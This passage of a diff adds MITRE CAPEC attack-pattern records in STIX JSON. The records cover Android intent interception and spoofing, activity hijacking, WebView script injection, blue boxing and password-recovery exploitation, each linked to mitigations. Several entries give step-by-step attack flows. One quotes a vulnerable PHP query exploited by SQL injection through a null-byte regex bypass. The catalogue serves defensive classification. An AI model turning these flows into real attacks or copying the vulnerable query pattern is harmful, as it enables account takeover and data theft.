"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously 
installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.", + "external_references": [ + { + "external_id": "CAPEC-499", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/499.html" + }, + { + "external_id": "CWE-925", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/925.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Intent Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents from a target application

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Intercept Implicit Intents: Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.

  2. Techniques
    Block the intent from reaching the desired location, causing a denial of service
    Gather sensitive information from the intercepted intent
    Modify the contents of the intent and forward along to another application
", + "x_capec_parent_of_refs": [ + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. 
Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ede8d88a-2bc4-4188-a9d7-2dbbe7c96fb5", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "target_ref": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. 
While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.\n \n This attack pattern is included in CAPEC for historical purposes.\n \n ", + "external_references": [ + { + "external_id": "CAPEC-5", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/5.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Blue Boxing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "System must use weak authentication mechanisms for administrative functions." 
+ ], + "x_capec_resources_required": [ + "CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch" + ], + "x_capec_skills_required": { + "Low": "Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades." + }, + "x_capec_status": "Obsolete", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Upgrade phone lines. Note this may be prohibitively expensive", + "id": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49c94014-b8f3-4700-b509-8b705cbfbb0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong access control such as two factor access control for administrative access to the switch", + "id": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9246fa28-1064-427d-b782-252991eab85a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.", + "external_references": [ + { + "external_id": "CAPEC-50", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/50.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-640", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/640.html" + }, + { + "description": "Advisory: Unauthorized password recovery in phpBannerExchange, 2006, RedTeam Pentesting GmbH", + "external_id": "REF-429", + "source_name": "reference_from_CAPEC", + "url": "http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt" + } + ], + "id": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Password Recovery Exploitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + 
"x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker clicks on the \"forgot password\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.", + "\n phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.\n A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.\n The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:\n if(!eregi(\"^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,3})$\", $email)){\n \n A bug in the implementation of eregi() allows to pass additional character using a null byte \"\\0\". 
Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \" ' \" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:\n $get_info=mysql_query(\"select * from banneruser whereemail='$email' \");\n \n This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.\n Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.See also: CVE-2006-3013" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand the password recovery mechanism and how it works.

Exploit

  1. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.

", + "x_capec_extended_description": "\n Most of them use only one security question. For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on \"forgot password\" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system allows users to recover their passwords and gain access back into the system.", + "Password recovery mechanism has been designed or implemented insecurely.", + "Password recovery mechanism relies only on something the user knows and not something the user has.", + "No third party intervention is required to use the password recovery mechanism." + ], + "x_capec_resources_required": [ + "For a brute force attack one would need a machine with sufficient CPU, RAM and HD." + ], + "x_capec_skills_required": { + "Low": "Brute force attack", + "Medium": "Social engineering and more sophisticated technical attacks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multiple security questions (e.g. have three and make the user answer two of them correctly). 
Let the user select their own security questions or provide them with choices of questions that are not generic.", + "id": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6da8ba67-d140-4a4f-9f59-04f18c0652dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5aefd1ed-4d4b-46a4-9523-4a9b10f1c157", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.", + "id": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa9f80ff-b2df-47d3-9f28-3979f0827e13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--faa418c0-4283-4c6d-b462-3c7751003bae", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that your password recovery functionality is not vulnerable to an injection style attack.", + "id": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-50-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--347ed834-4679-4e4c-9b81-cde8d3103190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17e33f25-5647-4186-9496-39840fbc7a3c", + "target_ref": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. 
Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.", + "external_references": [ + { + "external_id": "CAPEC-500", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/500.html" + }, + { + "external_id": "CWE-749", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/749.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "WebView Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target web application: An adversary first needs to determine what web application they wish to target.

  2. Techniques
    Target web applications that require users to enter sensitive information.
    Target web applications that an adversary wishes to operate on behalf of a logged in user.

Experiment

  1. Create malicious application: An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.

  2. Techniques
    Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.
    Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal.
  3. Get the victim to download and run the application: An adversary needs to get the victim to willingly download and run the application.

  4. Techniques
    Pay for App Store advertisements
    Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise.

Exploit

  1. Inject malicious code: Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView's loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.

  2. Techniques
    Execute operations on the targeted web page on behalf of an authenticated user.
    Steal cookie information from the victim.
    Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information.
", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.", + "id": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-500-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd4750af-dabe-4e24-954b-34c20912113b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3bed61fa-d7ce-4833-8489-af735deb4503", + "target_ref": "attack-pattern--3a089725-f495-452a-a40b-980898ec308c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a 
Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

  2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).", + "id": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8813501-20bf-40e5-8b15-3723c43763f4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--516fa894-49a7-4f72-93e4-a3f020c282a0", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Never use implicit intents for inter-application communication.", + "id": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-501-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa086131-b814-4144-b0d9-847410959588", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38f1729a-f19a-4847-86b0-d6fbb1ef4247", + "target_ref": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. 
If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.", + "external_references": [ + { + "external_id": "CAPEC-502", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/502.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Intent Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. 
Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.", + "id": "course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-502-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65d8ac0a-e778-439d-a210-5233c586c56e", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 